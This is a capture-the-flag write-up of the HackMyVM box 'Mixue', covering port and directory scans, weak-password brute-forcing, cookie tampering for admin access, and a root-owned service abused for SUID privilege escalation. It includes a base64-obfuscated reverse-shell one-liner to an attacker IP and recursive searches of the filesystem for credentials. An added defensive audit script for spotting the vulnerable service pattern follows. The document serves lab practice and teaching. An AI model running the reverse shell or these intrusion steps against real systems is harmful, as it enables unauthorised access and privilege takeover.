HackMyVM-Mixue

Another box from a group member; I got the user flag.

Information gathering


Target IP: 192.168.56.111

nmap scan:

nmap -T4 -A -v 192.168.56.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-02 10:57 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Initiating ARP Ping Scan at 10:57
Scanning 192.168.56.111 [1 port]
Completed ARP Ping Scan at 10:57, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:57
Completed Parallel DNS resolution of 1 host. at 10:57, 0.02s elapsed
Initiating SYN Stealth Scan at 10:57
Scanning 192.168.56.111 [1000 ports]
Discovered open port 22/tcp on 192.168.56.111
Discovered open port 80/tcp on 192.168.56.111
Completed SYN Stealth Scan at 10:57, 0.07s elapsed (1000 total ports)
Initiating Service scan at 10:57
Scanning 2 services on 192.168.56.111
Completed Service scan at 10:58, 6.03s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.111
NSE: Script scanning 192.168.56.111.
Initiating NSE at 10:58
Completed NSE at 10:58, 0.23s elapsed
Initiating NSE at 10:58
Completed NSE at 10:58, 0.01s elapsed
Initiating NSE at 10:58
Completed NSE at 10:58, 0.00s elapsed
Nmap scan report for 192.168.56.111
Host is up (0.00050s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: MIXUE Ice Cream & Tea - Official Site
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
MAC Address: 08:00:27:B7:D0:C7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Uptime guess: 25.680 days (since Wed May 7 18:38:39 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 192.168.56.111

NSE: Script Post-scanning.
Initiating NSE at 10:58
Completed NSE at 10:58, 0.00s elapsed
Initiating NSE at 10:58
Completed NSE at 10:58, 0.00s elapsed
Initiating NSE at 10:58
Completed NSE at 10:58, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds
Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.286KB)

dirsearch:

 _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                           
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/_192.168.56.111/_25-06-02_10-59-08.txt

Target: http://192.168.56.111/

[10:59:08] Starting:
[10:59:09] 403 - 279B - /.ht_wsr.txt
[10:59:09] 403 - 279B - /.htaccess.orig
[10:59:09] 403 - 279B - /.htaccess.sample
[10:59:09] 403 - 279B - /.htaccess.save
[10:59:09] 403 - 279B - /.htaccess_extra
[10:59:09] 403 - 279B - /.htaccess_orig
[10:59:09] 403 - 279B - /.htaccess_sc
[10:59:09] 403 - 279B - /.htaccessBAK
[10:59:09] 403 - 279B - /.htaccessOLD
[10:59:09] 403 - 279B - /.htaccessOLD2
[10:59:09] 403 - 279B - /.html
[10:59:09] 403 - 279B - /.htm
[10:59:09] 403 - 279B - /.htpasswd_test
[10:59:09] 403 - 279B - /.httr-oauth
[10:59:09] 403 - 279B - /.htpasswds
[10:59:10] 403 - 279B - /.htaccess.bak1
[10:59:10] 403 - 279B - /.php
[10:59:18] 302 - 0B - /dashboard.php -> login.php
[10:59:23] 200 - 832B - /login.php
[10:59:30] 403 - 279B - /server-status
[10:59:30] 403 - 279B - /server-status/
[10:59:35] 301 - 318B - /uploads -> http://192.168.56.111/uploads/
[10:59:35] 200 - 407B - /uploads/

gobuster:

gobuster dir -u 192.168.56.111 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.111
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,zip,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 20196]
/.html (Status: 403) [Size: 279]
/login.php (Status: 200) [Size: 2189]
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.111/uploads/]
/dashboard.php (Status: 302) [Size: 0] [--> login.php]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

Ports 22 and 80 are open, with the classic index/login/dashboard trio plus an uploads directory. At first I assumed I could upload a malicious file there myself, but that turned out to be wishful thinking.

index.html is a static page: nothing on it is clickable, and the email subscription form at the bottom is only a mock-up that cannot actually send anything.

/uploads/ is likewise an empty page with no upload button, and the page source contains nothing of interest.

Getshell


That leaves login, a classic login form. Trying admin against a common wordlist got nowhere.

Looking back at the bottom of the index page, there is an email address for sublarge; this is usually the site administrator's account. Brute-forcing again with sublarge as the username turns up the weak password 123456, and we are logged in.

(Besides admin and sublarge there are other weak-password accounts such as test and guest, but they all end up running as www-data, so it makes no difference.)

The dashboard then says we lack administrator privileges. Intercepting the request shows that the admin privilege is controlled entirely by a cookie.

Changing the cookie yields a command execution page; from there, reverse shell back to our host.

printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41Ni4xMDQvNDQ0NCAwPiYxKSAm|base64 -d|bash

Privilege escalation


After getting the webshell, I first checked the local web directory for anything usable; unfortunately there was nothing.

The admin password here is fairly complex and cannot be cracked with an ordinary wordlist, which made me think it was the SSH password and cost me quite a bit of time.

Looking at the users under /home, the first clue appears: one user's group is root.

Listing the files owned by that user, the very first one yields sublarge's SSH password.

find / -user suraxddq 2>/dev/null

If you had not spotted it, a brute-force grep would also turn it up.

grep "sublarge" -r -n / 2>/dev/null

SSH in as sublarge to get the user flag

ssh sublarge@192.168.56.111
sublarge@192.168.56.111's password:
Linux Mixue 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
sublarge@Mixue:~$ ls
user.txt
sublarge@Mixue:~$ cat user.txt
flag{user-88c71208-3bbd-11f0-b2d7-000c2955ba04}

Root


Back to suraxddq's files from earlier: there is a key file and a logs file.

www-data@Mixue:/home/suraxddq$ cat key
fix me
www-data@Mixue:/home/suraxddq$ cat logs
root@Mixue:~# cat /etc/systemd/system/key-monitor.service
[Unit]
Description=Key file monitor

[Service]
ExecStart=/usr/local/bin/monitor_key.sh
Restart=always

[Install]
WantedBy=multi-user.target

The logs file points to a shell script called monitor_key.

(Uploading a process monitor such as pspy would also reveal this directly.)

www-data@Mixue:/home/suraxddq$ cat /usr/local/bin/monitor_key.sh
#!/bin/bash
inotifywait -m -e modify,attrib,close_write,move,delete /home/suraxddq/key |
while read; do
/opt/change.sh
done

Whenever the key file is modified, change.sh is executed automatically.

www-data@Mixue:/home/suraxddq$ cat /opt/change.sh
#!/bin/bash


chown root:root /tmp/tmpfile 2>/dev/null
chmod 4755 /tmp/tmpfile 2>/dev/null
sleep 10
rm /tmp/tmpfile 2>/dev/null

It chowns /tmp/tmpfile to root and sets the SUID bit, so whatever is placed there then runs with root privileges.
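As an added example from the defender's side (not code from the write-up or from the target), here is a small POSIX shell audit that walks systemd unit files the way the chain above works: the root-run ExecStart script, the scripts it calls, and any chown/chmod on a path under /tmp. The audit_units and make_fixture names are my own, and the fixture make_fixture builds under mktemp is a constructed copy of the scripts shown above.

```shell
#!/bin/sh
# Added audit example (not from the write-up): report systemd units that run as root
# (no User= line) whose ExecStart script, or a script it calls, chowns/chmods files
# under /tmp or /var/tmp, i.e. the key-monitor.service -> monitor_key.sh -> change.sh
# pattern. make_fixture builds a constructed copy of that layout under mktemp.
# Print "unit|script|line|command" for every risky chown/chmod in $1/*.service.
audit_units() {
  unit_dir="$1"
  for unit in "$unit_dir"/*.service; do
    [ -f "$unit" ] || continue
    grep -q '^User=' "$unit" && continue            # drops privileges: skip
    main=$(sed -n 's/^ExecStart=-*\([^ ]*\).*/\1/p' "$unit" | head -n 1)
    [ -r "$main" ] || continue
    # Follow one level: absolute *.sh paths the main script invokes
    callees=$(grep -o '/[^[:space:]]*\.sh' "$main" | sort -u)
    for script in "$main" $callees; do
      [ -r "$script" ] || continue
      grep -n -E '^[^#]*(chown|chmod)[[:space:]].*(/tmp|/var/tmp)/' "$script" |
      while IFS=: read -r line cmd; do
        printf '%s|%s|%s|%s\n' "$unit" "$script" "$line" "$cmd"
      done
    done
  done
}

# Constructed fixture mirroring the target's layout; prints its root directory.
make_fixture() {
  root=$(mktemp -d)
  mkdir -p "$root/units" "$root/bin" "$root/opt"
  cat > "$root/opt/change.sh" <<'EOF'
#!/bin/bash
chown root:root /tmp/tmpfile 2>/dev/null
chmod 4755 /tmp/tmpfile 2>/dev/null
sleep 10
rm /tmp/tmpfile 2>/dev/null
EOF
  printf '#!/bin/bash\ninotifywait -m -e modify %s/key |\nwhile read; do\n%s/opt/change.sh\ndone\n' \
    "$root" "$root" > "$root/bin/monitor_key.sh"
  printf '[Unit]\nDescription=Key file monitor\n\n[Service]\nExecStart=%s/bin/monitor_key.sh\nRestart=always\n' \
    "$root" > "$root/units/key-monitor.service"
  # Same script but running unprivileged: must not be reported
  printf '[Service]\nUser=nobody\nExecStart=%s/bin/monitor_key.sh\n' \
    "$root" > "$root/units/safe.service"
  echo "$root"
}

demo_root=$(make_fixture)        # stand-alone run on the constructed fixture
audit_units "$demo_root/units"
rm -rf "$demo_root"
```

Pointing audit_units at /etc/systemd/system on a real host lists the same two lines for this box's change.sh and nothing for units that set User=.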

The exploit chain is clear; the only remaining difficulty is getting the ability to modify key, i.e. suraxddq's privileges.

Simple: the two users share the same password. (Sigh.)

(In fact every user, root included, uses this password.) (Sigh, sigh.)

tmpfile-5.0# cat root.txt 
flag{root-8b360934-3bae-11f0-b977-000c2955ba04}

This box is really very easy; the lessons are thorough information gathering and watching for password reuse.


http://example.com/2025/06/02/HackMyVM-Mixue/
Author: Skyarrow
Posted on June 2, 2025